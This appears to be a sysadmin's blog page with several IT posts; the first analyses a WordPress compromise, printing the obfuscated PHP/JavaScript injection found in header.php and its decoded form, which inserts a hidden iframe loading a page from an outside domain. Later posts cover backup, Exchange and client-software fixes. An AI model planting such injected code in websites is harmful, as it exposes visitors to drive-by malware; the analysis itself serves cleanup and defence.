WordPress Hack

Recently a customer’s site was hacked from an out of date plugin. The hack was pretty cool and took me a few hours to decipher

The hack entailed entering the following PHP code in the header of each file with the body tag

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This file then creating an iFrame which linked to another php file.

As you can see the code its really ciphered to stop detection however thanks to StopBadware.org , it was logged and alerted.

The below works by using 2 functions

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see below wtesq is declared to be 4 so this changes to -(62)+parseInt(iymigs[atodfh]16). This gets Java script to change the bolded string values into radix 16 values minus 62. Here’s some PHP to do this

<?php
 
$str = "%the string with commas removed%";
 
$hex = str_split($str, 2);
 
foreach ($hex as $value) {
    echo -(62)+intval("$value", 16);
    echo ", ";
 
}
 
?>

2) Cleverly hidden in \”fr\”+\”omCh\”+\”ar\”+\”Co\”+\”de\ gives you “fromCharCode” , so the values of this can be inserted into this online tool

http://jdstiles.com/java/cct.html

Which then gives us the code

function algl09() {
 var static='ajax';
 var controller='index.php';
 var algl = document.createElement('iframe');
 
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098';
 algl.style.top = '100098';
 
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}

To clean the exploit remove this off the header.php in WordPress and also clear up and HTML/PHP files in the root directory the hacker has created

 

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

When installing this version it tries to enable the following EMM.dll which only works for Outlook 2003. Unregister this file located in C:\Program Files (x86)\Interwoven\WorkSite\iOutlook via regsvr32 /u EMM.dll

This needs to be registered instead C:\Program Files (x86)\Interwoven\iOutlook\imFileSite.dll via regsvr32 imFileSite.dll

If this is disabled , go to Manage – Disabled Add-Ins click Go and Then Click Enable

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

27_IntroducingCompatibilityView_4Recently we had an HTML form that took a username and password to pass through to a silverlight web app. Using internet explorer when trying to log in , the form would refresh with no error message not log the user in. However the login worked internally fine….

Internet Explorer can detect if a website is internal through the IP address and automatically puts them in “Compatibility View” through the default Compatibility View Settings. As soon as we force the external IE client to use Compatibility it worked. We added this Meta Tag in the IIS Settings

<meta http-equiv=”X-UA-Compatible” content=”IE=EmulateIE7″ />

( Can be added to HTML as well ) which forced compatibility mode for External users as well ( No need to add the site manually )

However there was still a problem with Internet Explorer 10 not using this meta tag

Briefly, the issue is because that Asp.net doesn’t return Set-Cookie properly if the user agent sent in http request is IE10. It works for compatibility mode because the user agent will be set as IE7.

Thanks to http://www.hanselman.com/blog/BugAndFixASPNETFailsToDetectIE10CausingDoPostBackIsUndefinedJavaScriptErrorOrMaintainFF5ScrollbarPosition.aspx

Basically, what we need to do is to download and install some Microsoft hotfix. .NET 4 – http://support.microsoft.com/kb/2600088 .NET 2.0 http://support.microsoft.com/kb/2600100 for Win7 SP1/Windows Server 2008 R2 SP1, Windows Vista/Server 2008, Windows XP/Server 2003 http://support.microsoft.com/kb/2608565 for Win7/Windows Server 2008 R2 RTM

What the fixes do is update the ie.browser and firefox.browser files in \Windows\Microsoft.NET\Framework\<version>\Config\Browsers with new and future-proofed versions of these browser definitions. Nothing else is affected.

From the description of the blog, the patch is very safe to run its only job is updating several browser-sniffing related files (very small changes).

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

box_backup_vmware[1]We use Veam to backup our servers. Veam uses snapshots to copy the whole machine which can then get copied to disk to be backed up to tape. Sometimes due to changes on the servers through the night the Veam backup job overruns. When a backup is initialy created removed it can put strain on the disks and also take it offline. So when a job overruns it can take the server down during production.

Here is a powershell script which is run first thing in the morning so we know via email if we need to warn the business or cancel a backup of any issues!

Run this script on the machine with Veam installed, recommend you install PowerShell Version 3. Replace %xxx% values with your correct one!

asnp VeeamPSSnapin -ErrorAction SilentlyContinue
$PSEmailServer = "%ExchangeServer%"
$Activejobs = Get-VBRJob | ?{$_.GetLastState() -eq "Working"}
foreach($jobs in $Activejobs)
{
Send-MailMessage -From "%emailfrom@domain.com%" -to %emailto@domain.com% -Subject "Veam Job Still Running" -Body $jobs.name
}

 

To turn a powershell .ps1 script into a sheduled task do the following :

Run this program for the task: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and Add the location of the ps1 script as the argument of the scheduled task

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

DH_2D00_073113_2D00_1[1]Recently we were having issues with the time period of our Veam backups of SQL database. Veam creates a snapshot of a server, which can then be copied to disk or to tape subsiquently. The SQL servers were having their Indexes fully rebuilt every night.

“If you’re using the FULL recovery model, the entire index rebuild operation is fully logged, which means the transaction log file must be at least as large as the index being rebuilt. It also means the next
transaction log backup will essentially contain the entire index.” ( Per http://sqlmag.com/blog/it-bad-idea-rebuild-all-indexes-every-night  )

This balloned the storage needed on the SAN nightly by more than 1TB due to the writes of the transaction log and the changes from the inital snapshot and also slowed down the overall backup process

A smarter way to index the servers each night is to analyse the fragmented indexes , and only reindex thoose

This can be found here : http://blogs.technet.com/b/sql_server_isv/archive/2010/10/18/index-fragmentation-if-it-isn-t-broke-don-t-fix-it.aspx

Indexing tasks and scipts can be found here : http://technet.microsoft.com/en-us/library/ms189858.aspx

 

 

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

We had a recent issue with a new Blackberry Enterprise server with the Following Error showing in the Event Viwer

SRP connection down, ignore sending packets

First thing to test is the SRP Connection using blackberrys tool : BBSRPtest.exe. This is now found in the install files from Blackberry Setup ( so don’t remove! )

Running this proved the following error:

Registry key HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerryRouter is
missing, trying HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerry Enterp
rise Server\Dispatcher
Registry key HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerry Enterpris
e Server\Dispatcher is missing

 

The new version of this software needs variables in the command line

 E.g. BBSRPtest.exe -host au.srp.blackberry.com 3101 ( or your BB server from below )

https://www.blackberry.com/SRPAddressLookup/

VN:F [1.9.22_1171]
Rating: 10.0/10 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

usbpowerexceededrAfter rolling out Citrix Receiver Version 4 on some new IBM machines ( M Series ) it down graded the milli amp value of the generica USB hub from the standard 500mA to 100mA

There is a registry value to force this back up to 100mA which is located in

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB\Hardware ID of USB Hub\Paramters

( Find the Hardware ID of the USB hub in hardware ID’s )

“ForcePortPower” Dword : 500

Unplug and replug in device

However this did not work. The issue seems to be with the CitrixReciever.exe installing USB drivers causing the issue on some machine which are not needed in XenApp ( only Xen Desktop )

To install CitrixReciever without the USB Drivers you can run with the following command :

CitrixReceiver.exe /includeSSON ADDLOCAL=ICA_Client,ReceiverInside,SSON,AM,SELFSERVICE,DesktopViewer,Flash

 

 

VN:F [1.9.22_1171]
Rating: 9.5/10 (2 votes cast)
VN:F [1.9.22_1171]
Rating: +2 (from 2 votes)

When trying to produce the list below , it exported the results fine in the PowerShell Window , however when I tried to export to CSV I got this value

System.Collections.ObjectModel.Collection’1[Micorosoft.Exchange.Management.MapiTasks.FolderAccessRight]

Looking at a user who also had this error below I replcated AccessRights with

@{Name=’AccessRights’;Expression={[string]::join(“;“, ($_.AccessRights))}}

Make sure it only has one square braket though!

Reference : http://www.experts-exchange.com/Programming/Languages/Scripting/Powershell/Q_27099740.html

 

VN:F [1.9.22_1171]
Rating: 10.0/10 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Modified from the tracked back URL , this goes through all mailbox’s on the Exchange server and export’s their Mailbox Access Perimissions to CSV Files inside C:\Export\ and also any extra folder permissions that have been assigned to any other folders :

(Blank Folder name means mailbox access! )

 

$Mailboxes = Get-Mailbox -ResultSize Unlimited
 
ForEach ($Mailbox in $Mailboxes) {
 
$MBXFolders = @() 
$MBXFoldersCorr = New-Object System.Collections.ArrayList 
$Permissions = @() 
$MBX_tocheck = "$Mailbox" $MBXFolders = Get-MailboxFolderStatistics 
$MBX_tocheck | select folderpath
 
$Permissions += Get-MailboxPermission -Identity "$Mailbox" | where {$_.user.tostring() -ne "NT AUTHORITY\SELF" -and $_.IsInherited -eq $false} |
 
Select User,@{Name='AccessRights';Expression={[string]::join(', ', $_.AccessRights)}}
 
foreach ($item in $MBXFolders) {  $temp = $item.FolderPath  $temp = $Temp.Replace("/","\")  $MBXFoldersCorr.Add($temp) | out-null } foreach ($item in $MBXFoldersCorr) { Try {  $MailboxFolder = $MBX_tocheck + ":" + $item  $Permissions += $(Get-MailboxFolderPermission $MailboxFolder -ErrorAction Stop | Select-Object FolderName,User,AccessRights | where {
 
($_.AccessRights -notcontains “None”)})  } Catch {
 
 Continue  } }
 
 $Permissions | Select FolderName,User,@{Name='AccessRights';Expression={[string]::join(";", ($_.AccessRights))}}  | export-csv -path "C:\Export\
 
$MBX_tocheck.csv"
 
}

 

Get list of Full Access Mailbox permissions 

Get-Mailbox | Get-MailboxPermission | where { ($_.AccessRights -eq "FullAccess") -and ($_.IsInherited -eq $false) -and -not ($_.User -like "NT AUTHORITY\SELF") } | ft @{Name="Identity";expression={($_.Identity -split "/")[-1]}}, User -AutoSize

For Office 365

$Mailboxes = Get-Mailbox -ResultSize Unlimited
 
ForEach ($Mailbox in $Mailboxes) {
 
Get-MailboxFolderPermission -identity $Mailbox.name | Where AccessRights -ne "None" |FL
 
}

$Mailboxes = Get-Mailbox -ResultSize Unlimited

ForEach ($Mailbox in $Mailboxes) {

Get-MailboxFolderPermission -identity $Mailbox.name | Where AccessRights -ne “None” |FL

}

Get all current Mailbox Forwards

Get-mailbox -ResultSize unlimited | select DisplayName,ForwardingAddress | where {$_.ForwardingAddress -ne $Null}

A cool feature to make this better , would be to email this report out to each user so they can see the permissions on their mailbox and alter themselves or speak to the helpdesk!

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)